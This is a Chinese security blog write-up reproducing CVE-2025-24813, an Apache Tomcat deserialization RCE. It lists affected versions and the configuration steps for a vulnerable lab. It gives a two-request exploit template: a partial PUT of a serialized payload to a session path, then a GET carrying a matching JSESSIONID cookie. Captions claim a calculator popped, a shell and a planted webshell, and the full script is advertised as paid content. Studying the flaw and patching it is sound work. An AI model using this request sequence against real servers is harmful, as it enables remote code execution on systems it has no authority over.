复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)

admin 2025年3月13日21:49:31复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)已关闭评论59 views字数 1647阅读5分29秒阅读模式
复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)
免责声明  
    文章内容仅限授权测试学习使用勿进行非法的测试或攻击,利用本账号所发文章进行直接或间接的非法行为,均由操作者本人负全责,犀利猪安全及文章对应作者将不为此承担任何责任。
    文章来自互联网或原创,如有侵权可联系我方进行删除,深感抱歉。
复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)
复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)
0x00 漏洞描述 
    2025年3月11日,Tomcat官方发布了一个安全公告,修复一个特定条件的远程代码执行漏洞(CVE-2025-24813)。
    经测试,该漏洞可导致非默认配置的Tomcat被攻击者进行利用,使用反序列化的内容实现RCE,建议受影响的用户尽快修复此漏洞。
复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)
0x01 漏洞版本范围
  • 9.0.0.M1 <= tomcat <= 9.0.98

  • 10.1.0-M1 <= tomcat <= 10.1.34

  • 11.0.0-M1 <= tomcat <= 11.0.2

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)
0x02 利用条件
    漏洞产生的原因是默认servlet在启用写入的情况下,攻击者可以在特定目录下写入任意文件名的文件。结合Tomcat的临时session会话文件存储功能,可以实现反序列化RCE,利用需要满足以下几个条件:
   1、启用DefaultServlet写入,支持PUT请求;
    2、开启了Tomcat会话,并且使用了默认的会话存储位置;
    3、最主要的是类路径下需要存在一个反序列化利用链的库依赖库。
复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)
0x03 环境配置
    虽然利用条件在实际场景中很难同时满足,但是还是值得复现学习的,保不齐真遇到了呢?
    前往Tomcat,下载影响范围内安装包:
https://archive.apache.org/dist/tomcat/tomcat-9/https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.98/bin/apache-tomcat-9.0.98.exe

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)

    安装完成后,来到根目录下:

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)

    首先,进入conf,先修改context.xml文件,在Context标签内新增配置:

<Manager className="org.apache.catalina.session.PersistentManager">      <Store className="org.apache.catalina.session.FileStore"/>  </Manager>  

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)

 然后,修改web.xml文件:

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)

    搜索DefaultServlet,在如下位置插入:

<init-param>   <param-name>readonly</param-name>   <param-value>false</param-value></init-param

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)

    下载依赖,链接如下:

http://gitlab.53site.com/shuzhan/oss/-/raw/master/lib/commons-collections-3.2.1.jar?ref_type=heads

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)

    下载后,来到Tomcat根目录下,进入:webapps\ROOT\WEB-INF,在此路径下新建 lib 文件夹:

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)

    将下载的依赖复制到新建的 lib 中:

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)

    配置完成,进入bin目录启动Tomcat

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)
0x04 漏洞复现

    首先发送一个数据包,如下:

PUT /xxxxx/session HTTP/1.1Host: xxxContent-Length: 1000  Content-Range: bytes 0-1000/1200反序列化文件内容
复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)
    然后发送第二个包触发,Cookie里的xxxxx与第一个包路径的xxxxx一致:
GET / HTTP/1.1  Host: xxxCookie: JSESSIONID=.xxxxx

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)

弹计算器

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)

弹Shell

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)

种马子

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)

利用脚本

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)

完整复现步骤及脚本将上传至内部文库

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)
文库账号
劲爆价格
HOT

29.9一年,后期价格待定

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)
内含POC、各类SRC报告、学习文档
复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)
复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)
复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)
(
END
)
!扫码添加哦!
联系进群即可,群内可交流技术

复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)

没钱吃饭了,大哥给点吧

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月13日21:49:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   复现完毕 | Apache Tomcat远程代码执行,内含脚本(CVE-2025-24813)https://cn-sec.com/archives/3836212.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.